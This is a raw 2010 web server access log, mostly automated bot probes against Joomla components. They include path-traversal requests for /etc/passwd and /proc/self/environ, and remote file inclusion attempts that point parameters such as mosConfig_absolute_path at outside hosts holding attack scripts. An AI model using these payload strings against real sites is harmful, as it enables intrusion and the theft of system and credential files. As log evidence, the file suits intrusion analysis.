203.120.246.20 - - [29/Jun/2010:07:37:13 -0500] "GET /logs/access_log.1274054400//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
202.53.7.139 - - [29/Jun/2010:07:39:49 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.131.96.193 - - [29/Jun/2010:07:40:13 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:07:40:43 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:07:40:44 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
203.120.246.20 - - [29/Jun/2010:07:41:27 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
202.53.7.139 - - [29/Jun/2010:07:42:02 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
203.120.246.20 - - [29/Jun/2010:07:42:03 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:43:37 -0500] "GET /logs/access_log.1276041600/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
38.113.115.196 - - [29/Jun/2010:07:43:38 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:07:43:51 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.53.7.139 - - [29/Jun/2010:07:44:09 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
202.45.154.38 - - [29/Jun/2010:07:46:29 -0500] "GET /logs/access_log.1277424000/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
202.45.154.38 - - [29/Jun/2010:07:46:29 -0500] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.45.154.38 - - [29/Jun/2010:07:46:30 -0500] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:07:47:26 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.53.7.139 - - [29/Jun/2010:07:53:28 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.250.252.241 - - [29/Jun/2010:07:53:59 -0500] "GET /logs/access_log.1237593600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
202.45.154.38 - - [29/Jun/2010:07:54:08 -0500] "GET /logs/access_log.1274054400/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.59.130.120 - - [29/Jun/2010:07:56:35 -0500] "GET /logs/access_log.1277164800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.815"
209.59.130.120 - - [29/Jun/2010:07:56:35 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.815"
209.59.130.120 - - [29/Jun/2010:07:56:35 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.815"
203.120.246.20 - - [29/Jun/2010:07:58:01 -0500] "GET /logs/access_log.1276041600/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:58:02 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:58:03 -0500] "GET /logs/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:08:00:58 -0500] "GET /logs/access_log.1276732800/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:08:03:09 -0500] "GET /logs/access_log.1275782400/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:08:03:10 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:08:03:11 -0500] "GET /logs/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:08:03:14 -0500] "GET /logs/access_log.1276128000/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
66.129.109.12 - - [29/Jun/2010:08:03:57 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:03:57 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:03:57 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:05 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:15 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:32 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:32 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:32 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:38 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:38 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:38 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:04:52 -0500] "GET /logs/access_log.1275868800//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
209.59.130.120 - - [29/Jun/2010:08:04:59 -0500] "GET /logs/access_log.1274572800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.815"
66.129.109.12 - - [29/Jun/2010:08:05:00 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:05:10 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:05:19 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.195.112.180 - - [29/Jun/2010:08:05:32 -0500] "GET /logs/access_log.1181174400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.129.109.12 - - [29/Jun/2010:08:05:40 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:06:13 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:06:48 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:06 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:10 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:10 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:10 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:11 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:21 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:42 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:42 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:42 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:07:45 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
91.215.216.33 - - [29/Jun/2010:08:07:57 -0500] "GET /logs/access_log.1277164800%20%20//main.php?sayfa=http://djwenterprizes.com/Poppy/sc1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.215.216.33 - - [29/Jun/2010:08:07:57 -0500] "GET //main.php?sayfa=http://djwenterprizes.com/Poppy/sc1??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.215.216.33 - - [29/Jun/2010:08:07:57 -0500] "GET /logs//main.php?sayfa=http://djwenterprizes.com/Poppy/sc1??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.131.96.193 - - [29/Jun/2010:08:08:00 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:08:00 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:08:01 -0500] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.831"
66.129.109.12 - - [29/Jun/2010:08:09:18 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:09:18 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:09:18 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:09:18 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
209.126.254.119 - - [29/Jun/2010:08:09:29 -0500] "GET /logs/access_log.1274572800//main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.126.254.119 - - [29/Jun/2010:08:09:29 -0500] "GET /logs//main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.126.254.119 - - [29/Jun/2010:08:09:29 -0500] "GET //main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.129.109.12 - - [29/Jun/2010:08:09:52 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:09:52 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:09:52 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:09:53 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.131.96.193 - - [29/Jun/2010:08:10:10 -0500] "GET /logs/access_log.1277164800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:11:22 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:11:22 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:11:22 -0500] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:12:25 -0500] "GET /logs/access_log.1274572800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:12:25 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:12:25 -0500] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:12:40 -0500] "GET /logs/access_log.1277164800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:08:14:01 -0500] "GET /logs/access_log.1277164800//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
67.195.112.180 - - [29/Jun/2010:08:16:06 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.126.254.119 - - [29/Jun/2010:08:17:37 -0500] "GET /logs/access_log.1277164800%20%20//main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.195.112.180 - - [29/Jun/2010:08:21:51 -0500] "GET /logs/access_log.1178928000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.113.115.196 - - [29/Jun/2010:08:24:24 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:08:24:24 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:08:24:25 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.129.109.12 - - [29/Jun/2010:08:25:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:25:11 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.129.109.12 - - [29/Jun/2010:08:25:11 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
202.53.7.139 - - [29/Jun/2010:08:26:34 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
38.113.115.196 - - [29/Jun/2010:08:27:04 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.195.112.180 - - [29/Jun/2010:08:27:38 -0500] "GET /logs/access_log.1221609600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [29/Jun/2010:08:27:42 -0500] "GET /logs/access_log.1206316800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.252.241 - - [29/Jun/2010:08:29:30 -0500] "GET /logs/access_log.1215648000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.112.180 - - [29/Jun/2010:08:29:54 -0500] "GET /logs/access_log.1214524800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.231.187.33 - - [29/Jun/2010:08:30:45 -0500] "GET //?option=com_typedcontent&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:08:30:45 -0500] "GET /logs//?option=com_typedcontent&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 11365 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:08:30:45 -0500] "GET /logs/access_log.1277164800//?option=com_typedcontent&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:08:31:46 -0500] "GET /logs/access_log.1275264000//?option=com_typedcontent&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
208.115.111.248 - - [29/Jun/2010:08:34:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
38.113.115.196 - - [29/Jun/2010:08:35:25 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:08:35:25 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:08:35:26 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.171.37.206 - - [29/Jun/2010:08:36:34 -0500] "GET /logs//?option=com_joomlaxplorer&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 11365 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:08:36:34 -0500] "GET //?option=com_joomlaxplorer&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:08:36:34 -0500] "GET /logs/access_log.1277424000//?option=com_joomlaxplorer&Itemid=4&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
206.188.212.35 - - [29/Jun/2010:08:40:41 -0500] "GET /logs/access_log.1274572800/admin/business_inc/saveserver.php?thisdir=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
206.188.212.35 - - [29/Jun/2010:08:40:41 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
206.188.212.35 - - [29/Jun/2010:08:40:41 -0500] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
83.169.4.193 - - [29/Jun/2010:08:44:47 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
207.46.199.198 - - [29/Jun/2010:08:45:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.231.187.33 - - [29/Jun/2010:08:46:53 -0500] "GET //?option=com_akocomment&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:08:46:54 -0500] "GET /logs/access_log.1277164800//?option=com_akocomment&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:08:46:54 -0500] "GET /logs//?option=com_akocomment&Itemid=10&catid=&mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 200 11365 "-""libwww-perl/5.810"
91.82.250.167 - - [29/Jun/2010:08:49:39 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:08:49:41 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:08:49:49 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:08:50:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
187.45.193.159 - - [29/Jun/2010:08:52:11 -0500] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.143 - - [29/Jun/2010:08:52:11 -0500] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.190.166.35 - - [29/Jun/2010:08:53:35 -0500] "GET //?option=com_akolegal&Itemid=10&catid=&mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
195.190.166.35 - - [29/Jun/2010:08:53:35 -0500] "GET /logs//?option=com_akolegal&Itemid=10&catid=&mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 200 11365 "-""libwww-perl/5.65"
83.169.4.193 - - [29/Jun/2010:08:53:45 -0500] "GET //web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
207.46.195.223 - - [29/Jun/2010:08:53:58 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.116.197.150 - - [29/Jun/2010:08:58:57 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:08:58:57 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:08:58:57 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
